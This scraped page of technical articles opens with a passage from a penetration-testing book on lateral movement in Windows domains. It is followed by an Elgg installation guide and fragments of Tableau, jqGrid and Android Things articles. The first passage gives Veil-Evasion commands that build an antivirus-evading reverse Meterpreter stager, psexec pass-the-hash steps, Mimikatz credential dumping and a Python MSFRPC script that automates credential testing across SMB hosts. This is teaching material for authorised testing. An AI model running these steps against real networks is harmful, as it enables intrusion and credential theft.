signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]
Read more
  • 0
  • 0
  • 16067
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-elgg-social-networking-installation
Packt
28 Oct 2009
14 min read
Save for later

Elgg Social Networking - Installation

Packt
28 Oct 2009
14 min read
Installing Elgg In addition to its impressive feature list, Elgg is an admin's dolly. In this tutorial by Mayank Sharma, we will see how Elgg can be installed in popular Linux web application rollout stack of Linux, Apache, MySQL, and PHP, fondly referred to as LAMP. As MySQL and PHP can run under Windows operating system as well, you can set up Elgg to serve your purpose for such an environment. Setting Up LAMP Let's look at setting up the Linux, Apache, MySQL, PHP web server environment. There are several reasons for the LAMP stack's popularity. While most people enjoy the freedom offered by these Open Source software, small business and non-profits will also be impressed by its procurement cost—$0. Step 1: Install Linux The critical difference between setting up Elgg under Windows or Linux is installing the operating system. The Linux distribution I'm using to set up Elgg is Ubuntu Linux ( http://www.ubuntu.com/ ).It's available as a free download and has a huge and active global community, should you run into any problems. Covering step-by-step installation of Ubuntu Linux is too much of a digression for this tutorial. Despite the fact that Ubuntu isn't too difficult to install, because of its popularity there are tons of installation and usage documentation available all over the Web. Linux.com has a set of videos that detail the procedure of installing Ubuntu ( http://www.linux.com/articles/114152 ).Ubuntu has a dedicated help section ( https://help.ubuntu.com/ ) for introduction and general usage of the distribution. Step 2: Install Apache Apache is the most popular web server used on the Internet. Reams and reams of documents have been written on installing Apache under Linux. Apache's documentation sub-project ( http://httpd.apache.org/docs-project/ ) has information on installing various versions of Apache under Linux. Ubuntu, based on another popular Linux distribution, Debian, uses a very powerful and user-friendly packaging system. It's called apt-get and can install an Apache server within minutes. All you have to do is open a terminal and write this command telling apt-get what to install: apt-get install apache2 apache2-common apache2-doc apache2-mpm-prefork apache2-utils libapr0 libexpat1 ssl-cert This will download Apache and its most essential libraries. Next, you need to enable some of Apache's most critical modules: a2enmod ssla2enmod rewritea2enmod include The rewrite module is critical to Elgg, so make sure it's enabled, else Elgg wouldn't work properly. That's it. Now, just restart Apache with: /etc/init.d/apache2 restart. Step 3: MySQL Installing MySQL isn't too much of an issue either. Again, like Ubuntu and Apache, MySQL can also boast of a strong and dedicated community. This means there's no dearth of MySQL installation or usage related documentation ( http://www.mysql.org/doc/ ). If you're using MySQL under Ubuntu, like me, installation is just a matter of giving apt-get a set of packages to install: apt-get install mysql-server mysql-client libmysqlclient12-dev Finally, set up a password for MySQL with: mysqladmin -h yourserver.example.com -u root password yourrootmysqlpassword Step 4: Install PHP Support You might think I am exaggerating things a little bit here, but I am not, PHP is one of the most popular and easy to learn languages for writing web applications. Why do you think we are setting up out Linux web server environment to execute PHP? It's because Elgg itself is written in PHP! And so are hundreds and thousands of other web applications. So I'm sure you've guessed by now that PHP has a good deal of documentation ( http://www.php.net/docs.php )as well. You've also guessed it's now time to call upon Ubuntu's apt-get package manager to set up PHP:  apt-get install libapache2-mod-php5 php5 php5-common php5-gd php5-mysql php5-mysqli As you can see, in addition to PHP, we are also installing packages that'll hook up PHP with the MySQL database and the Apache web server. That's all there is to setting up the LAMP architecture to power your Elgg network. Setting Up WAMP If you are used to Microsoft's Windows operating system or want to avoid the extra minor learning curve involved with setting up the web server on a Linux distribution, especially, if you haven't done it before, you can easily replicate the Apache, MySQL, PHP web server on a Windows machine. Cost wise, all server components the Apache web server, MySQL database, and the PHP development language have freely available Windows versions as well. But the base component of this stack, the operating system —Microsoft Windows, isn't. Versions of Apache, MySQL, and PHP for Windows are all available on the same websites mentioned above. As Windows doesn't have an apt-get kind of utility, you'll have to download and install all three components from their respective websites, but you have an easier way to set up a WAMP server. There are several pre-packaged Apache, MySQL, and PHP software bundles available for Windows(http://en.wikipedia.org/wiki/Comparison_of_WAMPs).I've successfully run Elgg on the WAMP5 bundle (http://www.en.wampserver.com/). The developer updates the bundle, time and again, to make sure it's running the latest versions of all server components included in the bundle. Note - While WAMP5 requires no configuration, make sure you have Apache's rewrite_module and PHP's php_gd2 extension enabled. They will have a bullet next to their name if they are enabled. If the bullet is missing, click on the respective entries under the Apache and PHP sub-categories and restart WAMP5. Installing Elgg Now that we have a platform ready for Elgg, let's move on to the most important step of setting up Elgg. Download the latest version of Elgg from its website. At the time of writing this tutorial, the latest version of Elgg was Elgg-0.8. Elgg is distributed as a zipped file. To uncompress under Linux: Move this zipped file to /tmp and uncompress it with the following command: $ unzip /tmp/elgg-0.8.zip To uncompress under Windows: Right-click on the ZIP file and select the Extract here option. After uncompressing the ZIP file, you should have a directory called Elgg-<version-number>, in my case, elgg-0.8/. This directory contains several sub directories and files. The INSTALL file contains detailed installation instructions. The first step is to move this uncompressed directory to your web server. Note: You can set up Elgg on your local web server that sits on the Internet or on a paid web server in a data center anywhere on the planet. The only difference between the two setups is that if you don't have access to the local web server, you'll have to contact the web service provider and ask him about the transfer options available to you. Most probably, you'll have FTP access to your web server, and you'll have to use one of the dozens of FTP clients, available for free, to transfer Elgg's files from your computer to the remote web server. Optionally, if you have "shell" access on the web server, you might want to save time by transferring just the zipped file and unzipping it on the web server itself. Contact your web server provider for this information. The web server's directory where you need to copy the contents of the Elgg directory depends upon your Apache installation and operating system. In Ubuntu Linux, the default web server directory is /var/www/. In Windows, WAMP5 asks where it should create this directory during installation. By default, it's the www directory and is created within the directory you installed WAMP5 under. Note: Another important decision you need to make while installing Elgg is how do you want your users to access your network. If you're setting up the network to be part of your existing web infrastructure, you'll need to install Elgg inside a directory. If, on the other hand, you are setting up a new site just for the Elgg-powered social network, copy the contents of the Elgg directory inside the www directory itself and not within a subdirectory. Once you have the Elgg directory within your web server's www directory, it's time to set things in motion. Start by renaming the config-dist.php file to config.php and the htaccess-dist to .htaccess. Simply right-click on the file and give it a new name or use the mv command in this format: $ mv <original-file-name> <new-file-name> Note : To rename htacces-dist to .htaccess in Windows, you'll have to open the htaccess-dist file in notepad and then go to File | Save As and specify the name as .htaccess with the quotes. Editing config.php Believe it or not, we've completed the "installation" bit of setting up Elgg. But we still need to configure it before throwing the doors open to visitors. Not surprisingly, all this involves is creating a database and editing the config.php file to our liking. Creating a Database Making an empty database in MySQL isn't difficult at all. Just enter the MySQL interactive shell using your username, password, and hostname you specified while installing MySQL. $ mysql -u root -h localhost -pEnter password: Welcome to the MySQL monitor. Commands end with ; or g.Your MySQL connection id is 9 to server version: 5.0.22-Debian_0ubuntu6.06.3-logType 'help;' or 'h' for help. Type 'c' to clear the buffer.mysql> CREATE DATABASE elgg; You can also create a MySQL database using a graphical front-end manager like PHPMyAdmin, which comes with WAMP5. Just look for a database field, enter a new name (Elgg), and hit the Create button to create an empty Elgg database. Initial Configuration Elgg has a front-end interface to set up config.php, but there are a couple of things you need to do before you can use that interface: Create a data directory outside your web server root. As described in the configuration file, this is a special directory where uploaded files will go. It's also advisable to create this directory outside your main Elgg install. This is because this directory will be writable by everyone accessing the Elgg site and having such a "world-accessible" directory under your Elgg installation is a security risk. If you call the directory Elgg-data, make it world-readable with the following command: $ chmod 777 elgg-data Setup admin username and password. Before you can access Elgg's configuration web front-end, you need an admin user and a password. For that open the config.php file in your favorite text editor and scroll down to the following variables: $CFG->adminuser = "";$CFG->adminpassword = ""; Specify your chosen admin username and password between the quotes, so that it looks something like this: $CFG->adminuser = "admin";$CFG->adminpassword = "765thyr3"; Make sure you don't forget the username and password of the admin user. Important Settings When you have created the data directory and specified an admin username and password, it's time to go ahead with the rest of the configuration. Open a web browser and point to http://<your-web-server>/<Elgg-installation>/elggadmin/ This will open up a simple web page with lots of fields. All fields have a title and a brief description of the kind of information you need to fill in that field. There are some drop-down lists as well, from which you have to select one of the listed options. Here are all the options and their descriptions: Administration panel username: Username to log in to this admin panel, in future, to change your settings. Admin password: Password to log in to this admin panel in future. Site name: Enter the name of your site here (e.g. Elgg, Apcala, University of Bogton's Social Network, etc.). Tagline: A tagline for your site (e.g. Social network for Bogton). Web root: External URL to the site (e.g. http://elgg.bogton.edu/). Elgg install root: Physical path to the files (e.g./home/Elggserver/httpdocs/). Elgg data root: This is a special directory where uploaded files will go. If possible, this should live outside your main Elgg installation? (you'll need to create it by hand). It must have world writable permissions set, and have a final slash at the end. Note: Even in Windows, where we use back slashes () to separate directories, use Unix's forward slashes (/) to specify the path to the install root, data root, and other path names. For example, if you have Elgg files under WAMP's default directory in your C drive, use this path: C:/wamp/www/elgg/. Database type: Acceptable values are mysql and postgres - MySQL is highly recommended. System administrator email: The email address your site will send emails from(e.g. elgg-admin@bogton.edu). News account initial password: The initial password for the 'news' account. This will be the first administrator user within your system, and you should change the password immediately after the first time you log in. Default locale: Country code to set language to if you have gettext installed. Public registration: Can general members of the public register for this system? Public invitations: Can users of this system invite other users? Maximum users: The maximum number of users in your system. If you set this to 0, you will have an unlimited number of users. Maximum disk space: The maximum disk space taken up by all uploaded files. Disable public comments: Set the following to true to force users to log in before they can post comments, overriding the per-user option. This is a handy sledgehammer-to-crack-a-nut tactic to protect against comment spam (although an Akismet plug-in is available from elgg.org). Email filter: Anything you enter here must be present in the email address of anyone who registers; e.g. @mycompany.com will only allow email address from mycompany.com to register. Default access: The default access level for all new items in the system. Disable user templates: If this is set, users can only choose from available templates rather than defining their own. Persistent connections: Should Elgg use persistent database connections? Debug: Set this to 2047 to get ADOdb error handling. RSS posts maximum age: Number of days for which to keep incoming RSS feed entries before deleting them. Set this to 0 if you don't want RSS posts to be removed. Community create flag: Set this to admin if you would like to restrict the ability to create communities to admin users. cURL path: Set this to the cURL executable if cURL is installed; otherwise leave blank. Note : According to Wikipedia, cURL is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, TFTP, SCP,SFTP, Telnet, DICT, FILE, and LDAP. The main purpose and use for cURL is to automate unattended file transfers or sequences of operations. For example, it is a good tool for simulating a user's actions at a web browser. Under Ubuntu Linux, you can install curl using the following command: apt-get install curl Templates location: The full path of your Default_Template directory. Profile location: The full path to your profile configuration file (usually, it's best to leave this in mod/profile/). Finally, when you're done, click on the Save button to save the settings. Note : The next version of Elgg, Elgg 0.9, will further simplify installation. Already an early release candidate of this version (elgg-0.9rc1) is a lot more straightforward to install and configure, for initial use. First Log In Now, it's time to let Elgg use these settings and set things up for you. Just point your browser to your main Elgg installation (http://<your-web-servergt;/<Elgg-installation>). It'll connect to the MySQL database and create some tables, then upload some basic data, before taking you to the main page. On the main page, you can use the news account and the password you specified for this account during configuration to log in to your Elgg installation.
Read more
  • 0
  • 0
  • 16066

article-image-hands-on-table-calculation-techniques-with-tableau
Amarabha Banerjee
14 Feb 2018
4 min read
Save for later

Hands on Table Calculation Techniques with Tableau

Amarabha Banerjee
14 Feb 2018
4 min read
[box type="note" align="" class="" width=""]This article is a book excerpt from the title Mastering Tableau written by David Baldwin. This book will help you master the intricacies of Tableau to create effective data visualizations.[/box] Today, we shall explore Table Calculation Techniques with Tableau and explore a real world example of using these techniques. In this article, we provide a simple schema for understanding table calculations. This schema is communicated via two questions: What is the function? How is the function applied? These two questions are inexorably connected. You cannot reliably apply something until you know what it is. And you cannot get useful results from something until you correctly apply it. The sections below will help you to get a head start into Table calculation techniques and how to use Tableau functions effectively for implementing Table calculation. Basics of Table Calculation Calculated fields can be categorized as: row level, aggregate level, and table level. For row- and aggregate-level calculations, the underlying data source engine does most (if not all) of the computational work, and Tableau merely visualizes the results. For table calculations, Tableau also relies on the underlying data source engine to execute computational tasks; however, after that work is completed and a dataset is returned, Tableau performs additional processing before rendering the results. This can be seen within the following process flow diagram, in the circled part titled Tableau performs additional processing. This is where table calculations are processed. We will continue with a definition: A table calculation is a function performed on a dataset in cache that has been generated as a result of a query from Tableau to the data source. Let's consider a couple of points regarding the dataset in cache mentioned in the preceding definition. First, it is important to understand that this cache is not simply the returned results of a query. Tableau may adjust the returned results. For example,, Tableau may expand the cache via data densification. Secondly, it's important to consider how the cache is structured. Basically, the dataset in cache is a table and, like all tables, is made up of rows and columns. This is particularly important for table calculations since a table calculation may be computed as it moves along the cache. Such a table calculation is directional. Alternatively, a table calculation may be computed based on the entire cache with no directional consideration. Table calculations such as this are non-directional. Directional and nondirectional table calculations will be considered more fully in the following section. Directional and non-directional table calculation functions As of Tableau 10, there are 32 table calculation functions in Tableau. However, many of these are simply variations of a theme; for example, there are five Running functions, including RUNNING_SUM and RUNNING_AVG. If we narrow our consideration to unique groups of table calculations functions, we will discover that there are only 11. The following table shows these 11 functions organized in two categories: As mentioned previously, non-directional table calculation functions operate on the entire cache and thus are not computed based on movement through the cache. For example, the SIZE function doesn't change based on the value of a previous row in the cache. On the other hand, RUNNING_SUM does change based on previous rows in the cache and is therefore considered directional. Practical Example In this example, we'll see directional and non-directional table calculation functions in action: Navigate to h t t p s ://p u b l i c . t a b l e a u . c o m /p r o f i l e /d a v i d 1. . b a l d w i n #!/ to locate and download the workbook associated with this chapter. Navigate to the worksheet entitled Directional/Non-Directional. Create the following calculated fields: Place Category and Ship Mode on the Rows shelf. Double-click on Sales, Lookup, Size, Window Sum, Window Sum w/Start&End, and Running Sum to populate the view. Compare the following screenshot with the notes in step 3 of this exercise for better understanding: We discussed techniques for implementing table calculations with Tableau. If you liked our post, be sure to check out Mastering Tableau which consists of other useful data visualization and data analysis techniques.    
Read more
  • 0
  • 0
  • 16059

article-image-implementing-ajax-grid-using-jquery-data-grid-plugin-jqgrid
Packt
05 Feb 2010
9 min read
Save for later

Implementing AJAX Grid using jQuery data grid plugin jqGrid

Packt
05 Feb 2010
9 min read
In this article by Audra Hendrix, Bogdan Brinzarea and Cristian Darie, authors of AJAX and PHP: Building Modern Web Applications 2nd Edition, we will discuss the usage of an AJAX-enabled data grid plugin, jqGrid. One of the most common ways to render data is in the form of a data grid. Grids are used for a wide range of tasks from displaying address books to controlling inventories and logistics management. Because centralizing data in repositories has multiple advantages for organizations, it wasn't long before a large number of applications were being built to manage data through the Internet and intranet applications by using data grids. But compared to their desktop cousins, online applications using data grids were less than stellar - they felt cumbersome and time consuming, were not always the easiest things to implement (especially when you had to control varying access levels across multiple servers), and from a usability standpoint, time lags during page reloads, sorts, and edits made online data grids a bit of a pain to use, not to mention the resources that all of this consumed. As you are a clever reader, you have undoubtedly surmised that you can use AJAX to update the grid content; we are about to show you how to do it! Your grids can update without refreshing the page, cache data for manipulation on the client (rather than asking the server to do it over and over again), and change their looks with just a few keystrokes! Gone forever are the blinking pages of partial data and sessions that time out just before you finish your edits. Enjoy! In this article, we're going to use a jQuery data grid plugin named jqGrid. jqGrid is freely available for private and commercial use (although your support is appreciated) and can be found at: http://www.trirand.com/blog/. You may have guessed that we'll be using PHP on the server side but jqGrid can be used with any of the several server-side technologies. On the client side, the grid is implemented using JavaScript's jQuery library and JSON. The look and style of the data grid will be controlled via CSS using themes, which make changing the appearance of your grid easy and very fast. Let's start looking at the plugin and how easily your newly acquired AJAX skills enable you to quickly add functionality to any website. Our finished grid will look like the one in Figure 9-1:   Figure 9-1: AJAX Grid using jQuery Let's take a look at the code for the grid and get started building it. Implementing the AJAX data grid The files and folders for this project can be obtained directly from the code download(chap:9) for this article, or can be created by typing them in. We encourage you to use the code download to save time and for accuracy. If you choose to do so, there are just a few steps you need to follow: Copy the grid folder from the code download to your ajax folder. Connect to your ajax database and execute the product.sql script. Update config.php with the correct database username and password. Load http://localhost/ajax/grid to verify the grid works fine - it should look just like Figure 9-1. You can test the editing feature by clicking on a row, making changes, and hitting the Enter key. Figure 9-2 shows a row in editing mode:     Figure 9-2: Editing a row Code overview If you prefer to type the code yourself, you'll find a complete step-by-step exercise a bit later in this article. Before then, though, let's quickly review what our grid is made of. We'll review the code in greater detail at the end of this article. The editable grid feature is made up of a few components: product.sql is the script that creates the grid database config.php and error_handler.php are our standard helper scripts grid.php and grid.class.php make up the server-side functionality index.html contains the client-side part of our project The scripts folder contains the jQuery scripts that we use in index.html   Figure 9-3: The components of the AJAX grid The database Our editable grid displays a fictional database with products. On the server side, we store the data in a table named product, which contains the following fields: product_id: A unique number automatically generated by auto-increment in the database and used as the Primary Key name: The actual name of the product price: The price of the product for sale on_promotion: A numeric field that we use to store 0/1 (or true/false) values. In the user interface, the value is expressed via a checkbox The Primary Key is defined as the product_id, as this will be unique for each product it is a logical choice. This field cannot be empty and is set to auto-increment as entries are added to the database: CREATE TABLE product( product_id INT UNSIGNED NOT NULL AUTO_INCREMENT, name VARCHAR(50) NOT NULL DEFAULT '', price DECIMAL(10,2) NOT NULL DEFAULT '0.00', on_promotion TINYINT NOT NULL DEFAULT '0', PRIMARY KEY (product_id)); The other fields are rather self-explanatory—none of the fields may be left empty and each field, with the exception of product_id, has been assigned a default value. The tinyint field will be shown as a checkbox in our grid that the user can simply set on or off. The on-promotion field is set to tinyint, as it will only need to hold a true (1) or false (0) value. Styles and colors Leaving the database aside, it's useful to look at the more pertinent and immediate aspects of the application code so as to get a general overview of what's going on here. We mentioned earlier that control of the look of the grid is accomplished through CSS. Looking at the index.html file's head region, we find the following code: <link rel="stylesheet" type="text/css" href="scripts/themes/coffee/grid.css" title="coffee" media="screen" /><link rel="stylesheet" type="text/css" media="screen" href="themes/jqModal.css" /> Several themes have been included in the themes folder; coffee is the theme being used in the code above. To change the look of the grid, you need only modify the theme name to another theme, green, for example, to modify the color theme for the entire grid. Creating a custom theme is possible by creating your own images for the grid (following the naming convention of images), collecting them in a folder under the themes folder, and changing this line to reflect your new theme name. There is one exception here though, and it affects which buttons will be used. The buttons' appearance is controlled by imgpath: 'scripts/themes/green/images', found in index.html; you must alter this to reflect the path to the proper theme. Changing the theme name in two different places is error prone and we should do this carefully. By using jQuery and a nifty trick, we will be able to define the theme as a simple variable. We will be able to dynamically load the CSS file based on the current theme and imgpath will also be composed dynamically. The nifty trick involves dynamically creating the < link > tag inside head and setting the appropriate href attribute to the chosen theme. Changing the current theme simply consists of changing the theme JavaScript variable. JqModal.css controls the style of our pop-up or overlay window and is a part of the jqModal plugin. (Its functionality is controlled by the file jqModal.js found in the scripts/js folder.) You can find the plugin and its associated CSS file at: http://dev.iceburg.net/jquery/jqModal/   In addition, in the head region of index.html, there are several script src declarations for the files used to build the grid (and jqModal.js for the overlay): <script src="scripts/jquery-1.3.2.js" type="text/javascript"></script><script src="scripts/jquery.jqGrid.js" type="text/javascript"></script><script src="scripts/js/jqModal.js" type="text/javascript"></script><script src="scripts/js/jqDnR.js" type="text/javascript"></script> There are a number of files that are used to make our grid function and we will talk about these scripts in more detail later. Looking at the body of our index page, we find the declaration of the table that will house our grid and the code for getting the grid on the page and populated with our product data. <script type="text/javascript">var lastSelectedId;$('#list').jqGrid({ url:'grid.php', //name of our server side script. datatype: 'json', mtype: 'POST', //specifies whether using post or get//define columns grid should expect to use (table columns) colNames:['ID','Name', 'Price', 'Promotion'], //define data of each column and is data editable? colModel:[ {name:'product_id',index:'product_id', width:55,editable:false}, //text data that is editable gets defined {name:'name',index:'name', width:100,editable:true, edittype:'text',editoptions:{size:30,maxlength:50}},//editable currency {name:'price',index:'price', width:80, align:'right',formatter:'currency', editable:true},// T/F checkbox for on_promotion {name:'on_promotion',index:'on_promotion', width:80, formatter:'checkbox',editable:true, edittype:'checkbox'} ],//define how pages are displayed and paged rowNum:10, rowList:[5,10,20,30], imgpath: 'scripts/themes/green/images', pager: $('#pager'), sortname: 'product_id',//initially sorted on product_id viewrecords: true, sortorder: "desc", caption:"JSON Example", width:600, height:250, //what will we display based on if row is selected onSelectRow: function(id){ if(id && id!==lastSelectedId){ $('#list').restoreRow(lastSelectedId); $('#list').editRow(id,true,null,onSaveSuccess); lastSelectedId=id; } },//what to call for saving edits editurl:'grid.php?action=save'});//indicate if/when save was successfulfunction onSaveSuccess(xhr){ response = xhr.responseText; if(response == 1) return true; return false;}</script>
Read more
  • 0
  • 0
  • 16054

article-image-getting-started-android-things
Packt
21 Jul 2017
16 min read
Save for later

Getting Started with Android Things

Packt
21 Jul 2017
16 min read
